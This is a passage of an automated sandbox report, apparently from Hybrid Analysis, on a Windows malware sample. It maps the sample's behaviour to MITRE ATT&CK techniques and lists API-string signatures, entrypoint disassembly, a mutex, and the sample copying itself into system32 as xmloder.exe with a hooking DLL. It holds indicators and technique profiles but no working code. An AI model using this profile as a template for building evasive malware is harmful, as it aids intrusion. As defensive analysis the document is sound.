"https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Component Object Model", "attck_id": "T1559.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559/001", "informative_identifiers_count": 1, "parent": {"technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"CreateFileMappingA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"SOFTWARE\\Borland\\Delphi\\RTL\" in Source: 5009-230-0040283C\n \"SOFTWARE\\Borland\\Delphi\\RTL\" in Source: 00000000-00005684.00000000.66308.00401000.00000040.mdmp\n 00000000-00005684.00000001.66967.00401000.00000040.mdmp\n \"ege|SOFTWARE\\Microsoft\\W\" in Source: 00000000-00005684.00000000.66308.00401000.00000040.mdmp\n 00000000-00005684.00000001.66967.00401000.00000040.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"WinExec\" (Indicator: \"WinExec\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"WinExec\" (Indicator: \"WinExec\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"35982297210,5700,3135,,WinExec,kernel32.dll,\"252:09:44.551\",RX=0,PX=0\" (Indicator: \"WinExec\"; Source: \"00000000-00005684.00000001.66967.00240000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"CopyFileA\" to copy C:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe to new location %WINDIR%\\system32\\xmloder.exe (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Csutex\"\n \"Csutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xmloder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xmlDown.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" file has an entrypoint instructions - \"jmp\t0x44a0e8,push\tedi,push\tedi,add\tesp, 4,mov\tdword ptr [esp], ebx,sldt\tebx,push\tesi,mov\tebx, dword ptr [esp + 4],add\tesp, 8,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"xmloder.exe\" file has an entrypoint instructions - \"jmp\t0x44a0e8,push\tedi,push\tedi,add\tesp, 4,mov\tdword ptr [esp], ebx,sldt\tebx,push\tesi,mov\tebx, dword ptr [esp + 4],add\tesp, 8,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"xmlDown.dll\" file has an entrypoint instructions - \"jmp\t0x438a1b,push\teax,pop\teax,push\tesi,push\tesi,add\tesp, 4,ror\tesi, cl,push\tecx,push\tecx,mov\tesi, dword ptr [esp + 8],add\tesp, 0xc,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-78", "relevance": 1, "name": "Contains export functions", "description": "\"xmlDown.dll\" contains export function called \"DisableHook\" at ordinal 1\n \"xmlDown.dll\" contains export function called \"DllCanUnloadNow\" at ordinal 5\n \"xmlDown.dll\" contains export function called \"DllGetClassObject\" at ordinal 6\n \"xmlDown.dll\" contains export function called \"DllRegisterServer\" at ordinal 4\n \"xmlDown.dll\" contains export function called \"DllUnregisterServer\" at ordinal 3\n \"xmlDown.dll\" contains export function called \"EnableHook\" at ordinal 2", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-108", "type": 1, "relevance": 3, "name": "Contains ability to dynamically load libraries", "description": "LoadLibraryA@KERNEL32.DLL at 00000000-00005684-5009-78-00403C60\n LoadLibraryA@KERNEL32.DLL at 00000000-00005684-5009-76-00403B70\n LoadLibraryA@KERNEL32.DLL at 00000000-00005684-5009-33-0042C6D4\n LoadLibraryA@KERNEL32.DLL at 00000000-00005684-5009-52-00403D4C", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"GetProcAddress\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetCurrentThread\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"FatalExit\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetWriteWatch\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetCommTimeouts\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetWindowsDirectoryW\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"FindNextFileW\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetSystemPowerStatus\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"FindNextVolumeW\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetEnvironmentVariableA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetQueuedCompletionStatus\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"EnumCalendarInfoExA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetProcessAffinityMask\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetNamedPipeInfo\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"EnumDateFormatsExA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"FormatMessageA\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"GetVersion\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API (Indicator: \"WinExec\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GlobalHandle\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeExA\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoW\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetSystemTime\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetNumberFormatA\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTimeFormatW\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLocalTime\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThread\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FatalExit\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: 